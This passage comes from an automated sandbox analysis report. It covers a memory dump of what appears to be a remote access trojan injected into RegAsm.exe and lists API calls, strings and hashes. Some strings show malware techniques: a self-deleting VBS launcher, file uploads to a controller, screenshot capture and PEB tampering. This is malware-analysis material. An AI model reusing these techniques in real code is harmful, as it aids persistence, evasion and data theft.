                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$Write$Create
                                                                  • String ID: RIFF$WAVE$data$fmt
                                                                  • API String ID: 1602526932-4212202414
                                                                  • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                  • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                                                  • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                  • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                  • API String ID: 1646373207-255920310
                                                                  • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                  • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                                                  • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                  • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 0040CE07
                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                                                  • CopyFileW.KERNEL32 ref: 0040CED0
                                                                  • _wcslen.LIBCMT ref: 0040CEE6
                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                                                  • CopyFileW.KERNEL32 ref: 0040CF84
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                                                  • _wcslen.LIBCMT ref: 0040CFC6
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                                                  • CloseHandle.KERNEL32 ref: 0040D02D
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                                                  • ExitProcess.KERNEL32 ref: 0040D062
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                  • API String ID: 1579085052-2309681474
                                                                  • Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                                                  • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                                                  • Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                                                  • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?), ref: 0041C036
                                                                  • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                                                  • lstrlenW.KERNEL32(?), ref: 0041C067
                                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                                                  • _wcslen.LIBCMT ref: 0041C13B
                                                                  • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                                                  • GetLastError.KERNEL32 ref: 0041C173
                                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                                                  • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                                                  • GetLastError.KERNEL32 ref: 0041C1D0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                  • String ID: ?
                                                                  • API String ID: 3941738427-1684325040
                                                                  • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                                  • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                                                  • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                                  • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                                                    • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,636A1986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                    • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                                    • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                                                  • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                                                  • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                                                  • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                                                  • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                                                  • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                                                  • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                                                  • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                                                  • Sleep.KERNEL32(00000064), ref: 00412E94
                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                  • String ID: /stext "$0TG$0TG$NG$NG
                                                                  • API String ID: 1223786279-2576077980
                                                                  • Opcode ID: bc7e362d57d7670180143ae5cce880ef26dc034d902ff58de5e25bf17600ed29
                                                                  • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                                                  • Opcode Fuzzy Hash: bc7e362d57d7670180143ae5cce880ef26dc034d902ff58de5e25bf17600ed29
                                                                  • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$EnvironmentVariable
                                                                  • String ID:
                                                                  • API String ID: 1464849758-0
                                                                  • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                  • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                                                  • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                  • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                                                  • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseEnumOpen
                                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                  • API String ID: 1332880857-3714951968
                                                                  • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                                  • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                                                  • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                                  • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                                                  APIs
                                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                                                  • GetCursorPos.USER32(?), ref: 0041D5E9
                                                                  • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                                                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                                                  • ExitProcess.KERNEL32 ref: 0041D665
                                                                  • CreatePopupMenu.USER32 ref: 0041D66B
                                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                  • String ID: Close
                                                                  • API String ID: 1657328048-3535843008
                                                                  • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                  • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                                                  • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                  • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$Info
                                                                  • String ID:
                                                                  • API String ID: 2509303402-0
                                                                  • Opcode ID: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                                                  • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                                                  • Opcode Fuzzy Hash: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                                                  • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                                                  • __aulldiv.LIBCMT ref: 00408D4D
                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408FAE
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                  • API String ID: 3086580692-2582957567
                                                                  • Opcode ID: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                                                                  • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                                                  • Opcode Fuzzy Hash: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                                                                  • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                                                  APIs
                                                                  • Sleep.KERNEL32(00001388), ref: 0040A740
                                                                    • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                                                    • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                    • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                    • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E
                                                                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                  • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                  • API String ID: 3795512280-1152054767
                                                                  • Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                                                  • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                                                  • Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                                                  • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                                                  APIs
                                                                  • ___free_lconv_mon.LIBCMT ref: 0045130A
                                                                    • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                                                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                                                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                                                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                                                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                                                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                                                    • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                                                    • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                                                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                                                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                                                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                                                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                                                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                                                  • _free.LIBCMT ref: 004512FF
                                                                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                  • _free.LIBCMT ref: 00451321
                                                                  • _free.LIBCMT ref: 00451336
                                                                  • _free.LIBCMT ref: 00451341
                                                                  • _free.LIBCMT ref: 00451363
                                                                  • _free.LIBCMT ref: 00451376
                                                                  • _free.LIBCMT ref: 00451384
                                                                  • _free.LIBCMT ref: 0045138F
                                                                  • _free.LIBCMT ref: 004513C7
                                                                  • _free.LIBCMT ref: 004513CE
                                                                  • _free.LIBCMT ref: 004513EB
                                                                  • _free.LIBCMT ref: 00451403
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                  • String ID:
                                                                  • API String ID: 161543041-0
                                                                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                  • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                                                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                  • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00419FB9
                                                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                                                  • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                                                  • GetLocalTime.KERNEL32(?), ref: 0041A105
                                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                  • API String ID: 489098229-1431523004
                                                                  • Opcode ID: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                                                  • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                                                  • Opcode Fuzzy Hash: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                                                  • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                                                  APIs
                                                                    • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                    • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                    • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                                    • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
                                                                    • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                                  • ExitProcess.KERNEL32 ref: 0040D9C4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                  • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                  • API String ID: 1913171305-3159800282
                                                                  • Opcode ID: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
                                                                  • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                                                  • Opcode Fuzzy Hash: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
                                                                  • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID:
                                                                  • API String ID: 269201875-0
                                                                  • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                  • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                                                  • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                  • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                  • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                  • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                  • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                  • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                  • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                  • String ID:
                                                                  • API String ID: 3658366068-0
                                                                  • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                                  • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                                                  • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                                  • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                                                  APIs
                                                                    • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6
                                                                  • GetLastError.KERNEL32 ref: 00455CEF
                                                                  • __dosmaperr.LIBCMT ref: 00455CF6
                                                                  • GetFileType.KERNEL32 ref: 00455D02
                                                                  • GetLastError.KERNEL32 ref: 00455D0C
                                                                  • __dosmaperr.LIBCMT ref: 00455D15
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                                                  • CloseHandle.KERNEL32(?), ref: 00455E7F
                                                                  • GetLastError.KERNEL32 ref: 00455EB1
                                                                  • __dosmaperr.LIBCMT ref: 00455EB8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
